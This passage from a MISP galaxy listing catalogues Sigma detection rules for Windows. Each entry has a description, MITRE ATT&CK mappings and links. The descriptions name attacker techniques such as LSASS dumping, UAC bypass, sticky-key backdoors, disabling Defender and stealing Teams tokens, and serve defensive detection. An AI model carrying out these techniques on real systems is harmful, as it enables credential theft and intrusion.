  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10728. Table References

Links

https://pentestlab.blog/2020/07/06/indirect-command-execution/

https://lolbas-project.github.io/lolbas/Binaries/Forfiles/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_forfiles_proxy_execution_.yml

Suspicious Invoke-WebRequest Execution

Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location

The tag is: misp-galaxy:sigma-rules="Suspicious Invoke-WebRequest Execution"

Suspicious Invoke-WebRequest Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10729. Table References

Links

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Consent and Comctl32 - Process"

UAC Bypass Using Consent and Comctl32 - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10730. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml

Ie4uinit Lolbin Use From Invalid Path

Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories

The tag is: misp-galaxy:sigma-rules="Ie4uinit Lolbin Use From Invalid Path"

Ie4uinit Lolbin Use From Invalid Path has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10731. Table References

Links

https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml

NtdllPipe Like Activity Execution

Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe

The tag is: misp-galaxy:sigma-rules="NtdllPipe Like Activity Execution"

Table 10732. Table References

Links

https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml

Security Service Disabled Via Reg.EXE

Detects execution of "reg.exe" to disable security services such as Windows Defender.

The tag is: misp-galaxy:sigma-rules="Security Service Disabled Via Reg.EXE"

Security Service Disabled Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10733. Table References

Links

https://vms.drweb.fr/virus/?i=24144899

https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1

https://bidouillesecurity.com/disable-windows-defender-in-powershell/

https://twitter.com/JohnLaTwC/status/1415295021041979392

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml

PUA - Mouse Lock Execution

In Kaspersky’s 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.

The tag is: misp-galaxy:sigma-rules="PUA - Mouse Lock Execution"

PUA - Mouse Lock Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

Table 10734. Table References

Links

https://sourceforge.net/projects/mouselock/

https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml

Firewall Rule Update Via Netsh.EXE

Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule

The tag is: misp-galaxy:sigma-rules="Firewall Rule Update Via Netsh.EXE"

Table 10735. Table References

Links

https://ss64.com/nt/netsh.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_set_rule.yml

Exports Registry Key To a File

Detects the export of the target Registry key to a file.

The tag is: misp-galaxy:sigma-rules="Exports Registry Key To a File"

Exports Registry Key To a File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 10736. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml

Persistence Via Sticky Key Backdoor

By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched.

The tag is: misp-galaxy:sigma-rules="Persistence Via Sticky Key Backdoor"

Persistence Via Sticky Key Backdoor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 10738. Table References

Links

https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors

https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml

Sticky Key Like Backdoor Execution

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

The tag is: misp-galaxy:sigma-rules="Sticky Key Like Backdoor Execution"

Sticky Key Like Backdoor Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 10739. Table References

Links

https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml

WmiPrvSE Spawned A Process

Detects WmiPrvSE spawning a process

The tag is: misp-galaxy:sigma-rules="WmiPrvSE Spawned A Process"

WmiPrvSE Spawned A Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10740. Table References

Links

https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml

XSL Script Execution Via WMIC.EXE

Detects the execution of WMIC with the "format" flag to potentially load XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.

The tag is: misp-galaxy:sigma-rules="XSL Script Execution Via WMIC.EXE"

XSL Script Execution Via WMIC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

Table 10741. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml

Suspicious Regsvr32 Execution From Remote Share

Detects REGSVR32.exe to execute DLL hosted on remote shares

The tag is: misp-galaxy:sigma-rules="Suspicious Regsvr32 Execution From Remote Share"

Suspicious Regsvr32 Execution From Remote Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10742. Table References

Links

https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_remote_share.yml

Abuse of Service Permissions to Hide Services Via Set-Service

Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"…​etc. (Works only in powershell 7)

The tag is: misp-galaxy:sigma-rules="Abuse of Service Permissions to Hide Services Via Set-Service"

Abuse of Service Permissions to Hide Services Via Set-Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10743. Table References

Links

https://twitter.com/Alh4zr3d/status/1580925761996828672

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml

Detects the execution of a renamed version of the Plink binary

The tag is: misp-galaxy:sigma-rules="Renamed Plink Execution"

Renamed Plink Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10744. Table References

Links

https://the.earth.li/sgtatham/putty/0.58/htmldoc/Chapter7.html

https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml

PUA - NPS Tunneling Tool Execution

Detects the use of NPS, a port forwarding and intranet penetration proxy server

The tag is: misp-galaxy:sigma-rules="PUA - NPS Tunneling Tool Execution"

PUA - NPS Tunneling Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10745. Table References

Links

https://github.com/ehang-io/nps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nps.yml

MMC Spawning Windows Shell

Detects a Windows command line executable started from MMC

The tag is: misp-galaxy:sigma-rules="MMC Spawning Windows Shell"

MMC Spawning Windows Shell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 10746. Table References

Links

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml

Suspicious Scheduled Task Creation via Masqueraded XML File

Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Creation via Masqueraded XML File"

Suspicious Scheduled Task Creation via Masqueraded XML File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10747. Table References

Links

https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml

https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example—​xml-

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml

Service DACL Abuse To Hide Services Via Sc.EXE

Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.

The tag is: misp-galaxy:sigma-rules="Service DACL Abuse To Hide Services Via Sc.EXE"

Service DACL Abuse To Hide Services Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10748. Table References

Links

https://twitter.com/Alh4zr3d/status/1580925761996828672

https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/

https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml

Potential Process Injection Via Msra.EXE

Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics

The tag is: misp-galaxy:sigma-rules="Potential Process Injection Via Msra.EXE"

Potential Process Injection Via Msra.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10750. Table References

Links

https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf

https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml

LSASS Dump Keyword In CommandLine

Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.

The tag is: misp-galaxy:sigma-rules="LSASS Dump Keyword In CommandLine"

LSASS Dump Keyword In CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10751. Table References

Links

https://github.com/Hackndo/lsassy

https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf

https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml

https://github.com/CCob/MirrorDump

https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/

https://github.com/helpsystems/nanodump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

The tag is: misp-galaxy:sigma-rules="AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl"

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10752. Table References

Links

https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml

Suspicious Splwow64 Without Params

Detects suspicious Splwow64.exe process without any command line parameters

The tag is: misp-galaxy:sigma-rules="Suspicious Splwow64 Without Params"

Suspicious Splwow64 Without Params has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10753. Table References

Links

https://twitter.com/sbousseaden/status/1429401053229891590?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_splwow64_cli_anomaly.yml

CreateDump Process Dump

Detects uses of the createdump.exe LOLOBIN utility to dump process memory

The tag is: misp-galaxy:sigma-rules="CreateDump Process Dump"

CreateDump Process Dump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10754. Table References

Links

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

https://twitter.com/bopin2020/status/1366400799199272960

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml

RunDLL32 Spawning Explorer

Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way

The tag is: misp-galaxy:sigma-rules="RunDLL32 Spawning Explorer"

RunDLL32 Spawning Explorer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10755. Table References

Links

https://redcanary.com/blog/intelligence-insights-november-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_spawn_explorer.yml

Suspicious Copy From or To System Directory

Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.

The tag is: misp-galaxy:sigma-rules="Suspicious Copy From or To System Directory"

Suspicious Copy From or To System Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10756. Table References

Links

https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120

https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml

Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)

Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)

The tag is: misp-galaxy:sigma-rules="Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)"

Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10758. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml

Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN

dotnet.exe will execute any DLL and execute unsigned code

The tag is: misp-galaxy:sigma-rules="Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN"

Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10760. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/

https://twitter.com/_felamos/status/1204705548668555264

https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml

VMToolsd Suspicious Child Process

Detects suspicious child process creations of VMware Tools process which may indicate persistence setup

The tag is: misp-galaxy:sigma-rules="VMToolsd Suspicious Child Process"

VMToolsd Suspicious Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10761. Table References

Links

https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/

https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf

https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml

Veeam Backup Database Suspicious Query

Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.

The tag is: misp-galaxy:sigma-rules="Veeam Backup Database Suspicious Query"

Veeam Backup Database Suspicious Query has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 10762. Table References

Links

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml

Detected Windows Software Discovery

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.

The tag is: misp-galaxy:sigma-rules="Detected Windows Software Discovery"

Detected Windows Software Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

Table 10763. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md

https://github.com/harleyQu1nn/AggressorScripts

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml

Windows Shell/Scripting Processes Spawning Suspicious Programs

Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta…​etc.

The tag is: misp-galaxy:sigma-rules="Windows Shell/Scripting Processes Spawning Suspicious Programs"

Windows Shell/Scripting Processes Spawning Suspicious Programs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10764. Table References

Links

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml

AgentExecutor PowerShell Execution

Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument

The tag is: misp-galaxy:sigma-rules="AgentExecutor PowerShell Execution"

AgentExecutor PowerShell Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10765. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/

https://twitter.com/jseerden/status/1247985304667066373/photo/1

https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension

https://twitter.com/lefterispan/status/1286259016436514816

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml

Powershell Inline Execution From A File

Detects inline execution of PowerShell code from a file

The tag is: misp-galaxy:sigma-rules="Powershell Inline Execution From A File"

Powershell Inline Execution From A File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10766. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_exec_data_file.yml

New Kernel Driver Via SC.EXE

Detects creation of a new service (kernel driver) with the type "kernel"

The tag is: misp-galaxy:sigma-rules="New Kernel Driver Via SC.EXE"

New Kernel Driver Via SC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10767. Table References

Links

https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_new_kernel_driver.yml

Gpresult Display Group Policy Information

Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information

The tag is: misp-galaxy:sigma-rules="Gpresult Display Group Policy Information"

Gpresult Display Group Policy Information has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

Table 10768. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md

https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/

https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml

Use of FSharp Interpreters

The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.

The tag is: misp-galaxy:sigma-rules="Use of FSharp Interpreters"

Use of FSharp Interpreters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10769. Table References

Links

https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml

Hardware Model Reconnaissance Via Wmic.EXE

Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information

The tag is: misp-galaxy:sigma-rules="Hardware Model Reconnaissance Via Wmic.EXE"

Hardware Model Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10770. Table References

Links

https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks

https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml

Potentially Suspicious Command Targeting Teams Sensitive Files

Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Command Targeting Teams Sensitive Files"

Potentially Suspicious Command Targeting Teams Sensitive Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 10771. Table References

Links

https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens

https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml

Remote Access Tool - AnyDesk Piped Password Via CLI

Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - AnyDesk Piped Password Via CLI"

Remote Access Tool - AnyDesk Piped Password Via CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10772. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml

Shadow Copies storage symbolic link creation using operating systems utilities

The tag is: misp-galaxy:sigma-rules="VolumeShadowCopy Symlink Creation Via Mklink"

VolumeShadowCopy Symlink Creation Via Mklink has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10773. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml

Import LDAP Data Interchange Format File Via Ldifde.EXE

Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.

The tag is: misp-galaxy:sigma-rules="Import LDAP Data Interchange Format File Via Ldifde.EXE"

Import LDAP Data Interchange Format File Via Ldifde.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10775. Table References

Links

https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html

https://twitter.com/0gtweet/status/1564968845726580736

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml

Suspicious Microsoft Office Child Process

Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)

